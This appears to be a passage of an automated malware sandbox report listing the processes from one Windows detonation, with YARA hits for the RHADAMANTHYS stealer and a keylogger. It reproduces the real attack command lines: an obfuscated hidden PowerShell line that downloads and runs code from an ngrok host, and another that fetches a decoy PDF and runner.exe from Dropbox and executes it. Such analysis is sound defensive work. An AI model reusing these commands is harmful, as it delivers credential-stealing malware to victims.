                                                                                                                                                                                                                                                                                  Imagebase:0x7ff749a80000
                                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                                                  Start time:12:41:13
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                                                  Start time:12:41:13
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                                                  Start time:12:41:27
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                                                  Start time:12:41:27
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                                                  Start time:12:41:28
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1976,i,479339844209240994,6957522588551196104,262144 /prefetch:3
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                                                  Start time:12:41:28
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                                                  Start time:12:41:28
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2796 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:3
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                                                  Start time:12:41:32
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6340 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                                                                  Start time:12:41:32
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6528 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                                                                  Start time:12:41:33
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1462386273.bat" "
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff749a80000
                                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                                                                  Start time:12:41:33
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                                                                  Start time:12:41:33
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE; IWR -Uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; "
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                                                                  Start time:12:41:35
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7120 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7f6160000
                                                                                                                                                                                                                                                                                  File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                                                                  Start time:12:41:35
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7120 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7f6160000
                                                                                                                                                                                                                                                                                  File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

Target ID:20
Start time:12:41:42
Start date:10/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1027599800.pdf
Imagebase:0x7ff67dcd0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:12:41:43
Start date:10/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=2128,i,4843216233513846130,16606171289243587075,262144 /prefetch:3
Imagebase:0x7ff67dcd0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:12:41:44
Start date:10/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=3404 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
Imagebase:0x7ff67dcd0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:12:41:44
Start date:10/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8376 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:6
Imagebase:0x7ff67dcd0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:24
Start time:12:41:48
Start date:10/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Imagebase:0x7ff67dcd0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:12:41:48
Start date:10/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1108 --field-trial-handle=1948,i,14212657581130048292,735076137658541707,262144 /prefetch:3
Imagebase:0x7ff67dcd0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:12:41:50
Start date:10/12/2024
Path:C:\Users\user\AppData\Local\Temp\854113748.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\854113748.exe"
Imagebase:0x400000
File size:1'843'712 bytes
MD5 hash:EB40135D3E0FE985A9E09970DC09A499
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 26%, ReversingLabs
Has exited:true

Target ID:27
Start time:12:41:56
Start date:10/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Imagebase:0x7ff67dcd0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                                                                                  Start time:12:41:56
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1996,i,241946409549104947,2634262981403856413,262144 /prefetch:3
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                                                                                  Start time:12:42:09
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\854113748.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\854113748.exe"
                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                  File size:1'843'712 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:EB40135D3E0FE985A9E09970DC09A499
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001D.00000003.2340786736.0000000002FF0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001D.00000002.2353583074.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001D.00000003.2340562486.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001D.00000003.2337633012.00000000007B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                                                                                  Start time:12:42:10
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\fontdrvhost.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                                                                                                                                                                                                                  Imagebase:0x300000
                                                                                                                                                                                                                                                                                  File size:676'584 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:8D0DA0C5DCF1A14F9D65F5C0BEA53F3D
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001E.00000003.2342679249.00000000033C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001E.00000003.2349410799.0000000005690000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001E.00000003.2350549832.00000000058B0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001E.00000002.2470897649.0000000003580000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                                                                                  Start time:12:42:10
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 416 -s 444
                                                                                                                                                                                                                                                                                  Imagebase:0x7b0000
                                                                                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                                                                                  Start time:12:42:23
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\fontdrvhost.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff72c440000
                                                                                                                                                                                                                                                                                  File size:827'408 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                                                                                                                  Start time:12:42:26
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 7376 -s 148
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff68c250000
                                                                                                                                                                                                                                                                                  File size:570'736 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                                                                                                                  Start time:12:42:28
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6708 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2101226076.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2285912926.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                                                                                                                    Memory Dump Source
